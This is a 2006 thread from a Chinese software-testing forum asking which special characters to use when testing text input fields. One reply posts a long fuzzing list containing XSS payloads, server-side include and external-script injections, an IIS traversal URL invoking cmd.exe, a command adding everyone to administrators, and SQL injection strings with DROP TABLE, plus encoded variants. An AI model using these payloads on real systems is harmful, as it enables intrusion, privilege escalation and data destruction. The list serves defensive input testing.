51Testing软件测试论坛

 找回密码
 (注-册)加入51Testing

QQ登录

只需一步,快速开始

微信登录,快人一步

手机号码,快捷登录

查看: 13031|回复: 10
打印 上一主题 下一主题

[原创] 测试文本输入时常用到的特殊字符有哪些?

[复制链接]

该用户从未签到

跳转到指定楼层
1#
发表于 2006-11-7 14:48:00 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
测试文本输入时常用到的特殊字符有哪些?我想到了:_user,
test_user_,
‘user’,
“user123\~!@#$%^&*()_+/?|{[,
Test user,
User,
&nbsp,
还有哪些呢?
分享到:  QQ好友和群QQ好友和群 QQ空间QQ空间 腾讯微博腾讯微博 腾讯朋友腾讯朋友
收藏收藏
回复

使用道具 举报

该用户从未签到

2#
发表于 2006-11-7 14:59:36 | 只看该作者
有-(连字符和"_"在一个键上),……(省略号)还有中文状态下的标点、特殊字符(—,¥,)、括号(大,中,小)、、(顿号)等
回复 支持 反对

使用道具 举报

该用户从未签到

3#
 楼主| 发表于 2006-11-7 15:10:33 | 只看该作者
thx!
回复 支持 反对

使用道具 举报

  • TA的每日心情
    难过
    2015-4-23 14:35
  • 签到天数: 3 天

    连续签到: 1 天

    [LV.2]测试排长

    4#
    发表于 2006-11-7 16:41:34 | 只看该作者
    ~!`@#$%^&*()_+|[]-=\{};':"<>?,./~!·#¥%…&*()—+|`-=、[]{};‘:“,。/《》? 这些都属于特殊字符
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    5#
    发表于 2006-11-7 18:03:44 | 只看该作者
    MSFT%22>document.write(%22This%20page%20has%20the%20HTML%20security%20bug!%22);document.close();
    <TABLE><TR><TD>column 1 row 1</TD></TR></TABLE>
    %3CTABLE><TR><TD>column 1 row 1</TD></TR></TABLE>
    &#x3CTABLE><TR><TD>column 1 row 1</TD></TR></TABLE>
    %3CTABLE%3E%3CTR%3E%3CTD%3Ecolumn%201%20row%201%3C%2FTD%3E%3C%2FTR%3E%3C%2FTABLE%3E
    <img src=javascript:alert(document.domain)>
    <img src%3Djavascript:alert(document.domain)>
    TABLE><TR><TD>column 1 row 1</TD><%2FTR>/TABLE>
    TABLE><TR><TD>column 1 row 1</TD></TR></TABLE
    TABLE><TR><TD>column 1 row 1</TD></TR></TABLE>
    <TABLE><TR><TD>column 1 row 1</TD></TR></TABLE
    %25%33%43TABLE><TR><TD>column 1 row 1</TD></TR></TABLE>
    <!--# include virtual="http://matrixsrv4/testhack/test.inc" -->
    %3C%21%2D%2D%23%20include%20virtual%3D%22http%3A%2F%2Fmatrixsrv4%2Ftesthack%2Ftest%2Einc%22%20%2D%2D%3e
    <!--%23 include virtual="http://matrixsrv4/testhack/test.inc" -->
    <!--# include virtual="http://matrixsrv4/testhack/test.inc
    %23 include virtual="http://matrixsrv4/testhack/test.inc -->
    <%@ Language=VBScript %
    <%@ Language=VBScript %>
    &#x3C%25@ Language=VBScript %>
    &#x3C%25@ Language=VBScript %
    %25%33%43%@ Language%25%33%44VBScript %>
    <script language="Javascript" src="http://map.geoup.com/geoup"></script>
    <script language="Javascript" src="http://map.geoup.com/geoup"><script>
    script language="Javascript" src="http://map.geoup.com/geoup"></script>
    <script language="Javascript" src="http://map.geoup.com/geoup"></script
    %3Cscript%20language="Javascript" src="http://map.geoup.com/geoup"></script>
    %3Cscript%20language="Javascript" src="http://map.geoup.com/geoup"></script
    MsgBox "U R Hacked"
    %25%33%43script language="Javascript" src="http://map.geoup.com/geoup"></script>
    %25%33%43script language="Javascript" src="http://map.geoup.com/geoup"></script
    %25%3343script language="Javascript" src="http://map.geoup.com/geoup"></script
    set path=c:\hacked
    http://%computername%/scripts/..%c0%af../winnt/system32/cmd.exe net stop w3csvc
    %22C:%5CDocuments%20and%20Settings%5C%25username%25%5CDesktop%5Chak.bat%22
    net localgroup administrators everyone /add %3E c:\addadmin.log
    Sql’’INSERT INTO database.tablename1 (column names) SELECT * FROM database.tablename2 --
    Sql’’INSERT INTO database.tablename (column name, column name) '980832','yatta yatta' --
    Sql’’CREATE database.tablename (table element list) --
    Sql’’DROP TABLE database.tablename --
    Sql’’DROP VIEW database.view --
    Sql’’DROP PROCEDURE database.procedure --
    Sql’’UPDATE database.tablename SET columnname = 0 --
    <!-- Body --> <!ELEMENT body    (tu*) > <!-- No attributes  -->
    %3C%21-- Body --> <!ELEMENT body    (tu*) > <!-- No attributes  -->
    <!-- Body -- <!ELEMENT body    (tu*) > <!-- No attributes  -->
    !-- Body --> <!ELEMENT body    (tu*) > <!-- No attributes  -->
    <!-- Body --> <!ELEMENT body    (tu*) > <!-- No attributes  --
    <!-- Body -- <!ELEMENT body    (tu*) > %3C!-- No attributes  --%3E
    %25%33%43%2521-- Body --> <!ELEMENT body    (tu*) > <!-- No attributes  -->
    %3C%21%2D%2D%20Body%20%2D%2D%3E%20%3C%21ELEMENT%20body%20%20%20%20%28tu%2A%29%20%3E%20%3C%21%2D%2D%20No%20attributes%20%2D%2D%3E
    %21%2D%2D%20Body%20%2D%2D%3E%20%3C%21ELEMENT%20body%20%20%20%20%28tu%2A%29%20%3E%20%3C%21%2D%2D%20No%20attributes%20%2D%2D%3E
    %3C%21%2D%2D%20Body%20%2D%2D%3E%20%3C%21ELEMENT%20body%20%20%20%20%28tu%2A%29%20%3E%20%3C%21%2D%2D%20No%20attributes%20%2D%2D
    0xF900 0xFFFE
    &#x3C!-- Body --> <!ELEMENT body    (tu*) > <!-- No attributes  -->
    &lt!-- Body --&gt &lt!ELEMENT body    (tu*) &gt &lt!-- No attributes  --&gt
    #
    0.23
    :
    %3A
    \
    %5C
    ?
    %3F
    *
    %2A
    <&nbsp;
    %3C
    >&nbsp;
    %3E
    %
    0.25
    /
    %2F
    |
    %7C
    "
    0.22
    ~
    %7E
    lbot~/%2f?url%26
    http://www:microsoft.com
    http%3A%2F%2Fwww%2Emicrosoft%2Ecom
    http%25%33%41%25%32%46%25%32%46www%25%32%45microsoft%25%32%45com
    ftp://(enter valid address)
    ftp%3A%2F%2F(enter valid address)
    ftp%25%33%41%25%32%46%25%32%46(enter valid address)
    file://C:\WINNT\system32\inetsrv\iisadmin\default.asp
    file%3A%2F%2FC%3A%5CWINNT%5Csystem32%5Cinetsrv%5Ciisadmin%5Cdefault.asp
    file%25%33%41%25%32%46%25%32%46C%25%33%41%25%35%43WINNT%25%35%43system32%25%35%43inetsrv%25%35%43iisadmin%25%35%43default%25%32%45asp
    https://(enter valid https address)
    http%73%3A%2F%2F(enter valid https address)
    http%25%73%25%33%41%25%32%46%25%32%46(enter valid https address)
    gopher://(enter valid address)
    telnet (enter address)
    mailto://aaronspa@microsoft.com
    mailto%3A%2F%2Faaronspa%40microsoft%2Ecom
    mailto%25%33%41%25%32%46%25%32%46Caaronspa%2540microsoft%25%32%45com
    news://(newsgroup)
    http:://www.microsoft.com
    http%3A%3A%2F%2Fwww%2Emicrosoft%2Ecom
    http://www:microsoft.com
    http%3A%2F%2Fwww%3Amicrosoft%2Ecom
    http:/www.microsoft-com
    http%3A%2Fwww%2Emicrosoft%2Dcom
    http//microsoft.com
    http%2F%2Fmicrosoft%2Ecom
    http://.microsoft.com
    http%3A%2F%2F%2Emicrosoft%2Ecom
    http://microsoft..com
    http%3A%2F%2Fmicrosoft%2E%2Ecom
    file://C::\WINNT\system32\inetsrv\iisadmin\defaul.aspt
    file://C:\WINNT\system32\inetsrv\iisadmin\defaul.text
    file://C:\WINNT\system32\inetsrv\..\iisadmin\defaul.asp
    \b
    %5C%62
    \f
    %5C%66
    \n
    %5C%6E
    \r
    %5C%72
    \t
    %5C%74
    \'
    %5C%27
    \"
    %5C%22
    break
    return:
    delete
    strcopy
    &copy;
    &reg;

    Dáta
    &pound;
    &yen;

    &iexcl;

    ;
    %3B
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    6#
    发表于 2006-11-7 19:17:28 | 只看该作者
    所有涉及Sybase数据库Query的时候,输入',必定报错,屡试不爽,呵呵
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    7#
     楼主| 发表于 2006-11-8 11:15:11 | 只看该作者
    小南 :不太明白你的意思
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    8#
    发表于 2006-11-8 11:32:26 | 只看该作者
    也许 小南 是告诉你各种语言用到的字符(包括数据库用到的语句)和其它转意字符吧
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    9#
    发表于 2006-11-8 16:29:35 | 只看该作者
    谢谢小南.收藏先...
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    10#
    发表于 2007-10-24 15:20:05 | 只看该作者
    所有涉及Sybase数据库Query的时候,输入',必定报错,屡试不爽.
    这句话太对了,我以前怎么就没有发现这个符号有这么大的用处呢
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    11#
    发表于 2009-5-6 16:41:35 | 只看该作者

    特殊字符要不要因具体的而分类啊???

    俺是新手,可是我觉得特殊字符的输入是不是要按不同的要求划分开啊 ??比如用户名的输入和日期的输入。
    回复 支持 反对

    使用道具 举报

    本版积分规则

    关闭

    站长推荐上一条 /1 下一条

    小黑屋|手机版|Archiver|51Testing软件测试网 ( 沪ICP备05003035号 关于我们

    GMT+8, 2024-11-19 20:25 , Processed in 0.091458 second(s), 27 queries .

    Powered by Discuz! X3.2

    © 2001-2024 Comsenz Inc.

    快速回复 返回顶部 返回列表